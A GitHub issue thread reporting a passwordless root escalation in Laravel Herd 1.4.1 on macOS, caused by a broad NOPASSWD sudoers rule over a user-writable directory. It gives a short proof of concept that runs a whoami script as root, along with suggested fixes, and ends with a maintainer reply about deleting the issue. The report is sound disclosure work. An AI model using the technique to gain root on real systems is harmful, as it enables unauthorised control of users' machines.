### ISSUE TITLE
[Bug]: Passwordless Privilege Escalation by User Which Installed Herd

### ISSUE THREAD

**Issue by jfe-imarc** [beyondcode/herd-community#415]
### Operating system version

macOS Ventura 13.6.4

### System architecture

ARM64 (M1, M2, etc)

### Herd Version

1.4.1

### Bug description

Creating a new issue as this is a security vulnerability/bug, not a feature request as the previous issue that Herd closed and I commented on indicated. I provide more detail regarding this being a privilege escalation vulnerability rather than only a suggested practice to avoid.

The NOPASSWD sudoers rule that Herd creates during installation allows for passwordless privilege escalation for any program running under the MacOS user account that Laravel Herd was installed under.

Here's a simple test you can run after a clean install:

```
cd /Applications/Herd.app/Contents/Resources 
echo "#\!/bin/bash\nwhoami" > whoami.sh
chmod 755 whoami.sh
sudo ./whoami.sh
```

Two of my team members tested this after a fresh install of the DMG:

```
~ % cd /Applications/Herd.app/Contents/Resources
Contents/Resources % echo "#\!/bin/bash\nwhoami" > whoami.sh
Contents/Resources % chmod 755 whoami.sh
Contents/Resources % sudo ./whoami.sh
root
Contents/Resources % ls -alh /Applications/Herd.app/Contents/Resources
total 379400
drwxr-xr-x@ 30 REDACTED_USERNAME  admin   960B Feb 21 09:04 .
drwxr-xr-x@ 10 REDACTED_USERNAME  admin   320B Feb 13 09:13 ..
(...)
```

I understand that another piece of software may also install with a similar sudoers rule, but that isn't relevant to the immediate threat having a default installation of Laravel Herd creates for your users. This vulnerability allows any arbitrary program running under the user who installed Herd's account to execute arbitrary code as root as evidenced by the above steps to reproduce.

My first suggestion for remediation would be to always prompt users for a password when wanting to bind to ports 80 and 443. 

If prompting for a password is off the table, a second option would be to restrict the sudoers rule to only the specific binaries or scripts in the Resources directory and ensure that those executables are only writable by root. 

Example: 
`%admin ALL=(root) NOPASSWD:SETENV: /Applicatoins/Herd.app/Contents/Resources/*`...
becomes
`%admin ALL=(root) NOPASSWD:SETENV: /Applicatoins/Herd.app/Contents/Resources/SPECIFIC_FILE_THAT_NEEDS_SUDO`

### Steps to reproduce

Install Herd 1.4.1 or earlier from the DMGs provided on the official site, then run the following in bash:

```
cd /Applications/Herd.app/Contents/Resources 
echo "#\!/bin/bash\nwhoami" > whoami.sh
chmod 755 whoami.sh
sudo ./whoami.sh
```

You will receive "root" as the response from the whoami script, indicating that you executed the script as root without being prompted for a password. Any program running under the user can write files to this directory and subsequently execute them with root permissions, clearly meeting the definition of a privilege escalation vulnerability.

**Comment by sschlein** [comment]
We've noticed this and i am deleting this issue now, please follow up with us at support@beyondco.de for security issues. This comment is for you to get an email before this issue is deleted.
